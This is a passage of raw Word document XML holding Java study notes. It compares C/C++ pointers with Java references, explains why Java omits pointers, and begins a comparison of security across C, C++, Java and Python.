          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47D67F7E"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nual memory management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AE5D374"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utomatic Garbage Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="0112DDE6" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D19D70"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ointer arithmetic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E918E75"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Not allowed at all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BD7674B" w14:textId="4B568FD5" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="009F689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5EC77D2E" w14:textId="403BA561" w:rsidR="00C81F35" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81F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6673349"/>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Hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012F85DA"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 s holds a reference to a String object in memory (not a pointer you can manipulate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172EA14A"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t get its address or do pointer math like s++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE43FC" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F68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C9A5B3">
          <v:rect id="_x0000_i1128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3176A"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So What's the Differe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6"/>
        <w:gridCol w:w="2458"/>
        <w:gridCol w:w="2955"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="214D6DD5" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26961F4B" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="00276E09">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ept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683B354B" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="00276E09">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ointers (C/C++)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42786F2A" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="00276E09">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References (Java)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="5772288E" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="327B5A79"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emory Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414AA27B"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irect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6748304F"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direct (no control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="7B1269D7" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518AB1F7"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ithmetic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50DA3D87"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lowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F7733FD"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Not allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="5B5A2178" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C7363C1"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ull Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C6A653"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isk of Segfault</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE7955E"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ullPointerException (still safer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="7D575DB4" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC2EF35"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Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="705F8C55"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level programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C978F0B"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pplication-level programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BB2B1E3" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F68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8E6CA27">
          <v:rect id="_x0000_i1129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F0FBB"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JVM Handles the Memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB509A" w14:textId="77777777" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="009F689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 manages memory behind the scenes using the JVM and Garbage Collector, freeing developers from manual memory management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A3B1C" w14:textId="7C906E15" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009F689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6B4AE53">
          <v:rect id="_x0000_i1130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195F6C2" w14:textId="0515D3D6" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="004A110F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc196307510"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why doesn't java support pointers</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1E649CFA" w14:textId="40389A7A" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0" w:rsidP="00801582">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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w: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ecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191AE86" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ointers allow direct memory access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910B840" w14:textId="7E1CCA81" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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can lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A49502" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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uffer overflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005DCA8" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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emory leaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D76A9C" w14:textId="6344C351" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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nauthorized memory access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28219CBE" w14:textId="426D494B" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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y hiding pointers, Java prevents low-level memory manipulation and increases application security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C86F619" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005739E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87CAEE0">
          <v:rect id="_x0000_i1131" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="509BE516" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0" w:rsidP="005739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2. </w:t>
      </w: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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simplicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCE1C7" w14:textId="77777777" w:rsidR="001C7F24" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 was designed to be simple and easy to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17297E" w14:textId="77777777" w:rsidR="001C7F24" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ointers can be hard to understand and error-prone, especially for beginners (e.g., pointer arithmetic, null pointer dereferencing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2DDF3" w14:textId="609068F3" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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moving pointers removes a major source of bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F99F8C" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005739E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24DB42B">
          <v:rect id="_x0000_i1132" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AA9C1" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0" w:rsidP="005739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3. </w:t>
      </w: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Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E388134" w14:textId="77777777" w:rsidR="001C7F24" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 uses automatic garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1EE9B" w14:textId="77777777" w:rsidR="001C7F24" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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raw pointers were allowed, it would confuse or break the garbage collector, which tracks objects using internal references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E296AD5" w14:textId="294F98B4" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ointers would let developers manipulate memory outside the GC’s knowledge, making safe memory management impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F456A8" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005739E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A05CBEE">
          <v:rect id="_x0000_i1133" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD2673" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0" w:rsidP="005739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4. </w:t>
      </w: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Avoids Manual Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D862C7A" w14:textId="77777777" w:rsidR="001C7F24" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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languages like C/C++, you need to malloc/free memory manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D535C" w14:textId="2E8FCBB2" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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 automates memory allocation/deallocation, making code less error-prone and more maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712399A1" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005739E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B6D6266">
          <v:rect id="_x0000_i1134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9B1F1" w14:textId="77777777" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0" w:rsidP="005739E0">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What Java Uses Instead?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C102612" w14:textId="77777777" w:rsidR="003164AE" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ferences — like pointers, but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFC9AB" w14:textId="77777777" w:rsidR="003164AE" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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direct access to memory addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EC2C7" w14:textId="77777777" w:rsidR="003164AE" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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pointer arithmetic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E484D8" w14:textId="287E12AA" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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naged and tracked by the JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47816E3C" w14:textId="3513C94E" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005739E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B2C7F13">
          <v:rect id="_x0000_i1135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BAF65" w14:textId="2D8E2239" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="009A7C02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc196307511"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain which language you prefer in terms of security among C, C++, Java and Python</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="43C1E8EB" w14:textId="3A76F6EF" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each of these languages has its own strengths and weaknesses when it comes to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the level of security often depends on how the developer writes the code. However, I can break down the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security aspects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each language to help you understand which one is inherently more secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0111576A" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00133B2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5DC32EB">
          <v:rect id="_x0000_i1136" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11534165" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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1. Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420088E6" w14:textId="77777777" w:rsidR="00133B25" w:rsidRPr="00CE4B95" w:rsidRDefault="00133B25" w:rsidP="00133B2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ecurity Strengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990B04B"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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which helps avoid memory leaks and dangling pointers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC7E90A"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Pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java doesn’t support pointers, which prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer overflows</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dangling pointer issue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memory corruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4643FC86"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ception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java has a built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>robust exception handling system</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that helps catch and manage runtime errors, making it safer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393B7CFE"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ytecode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java runs on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
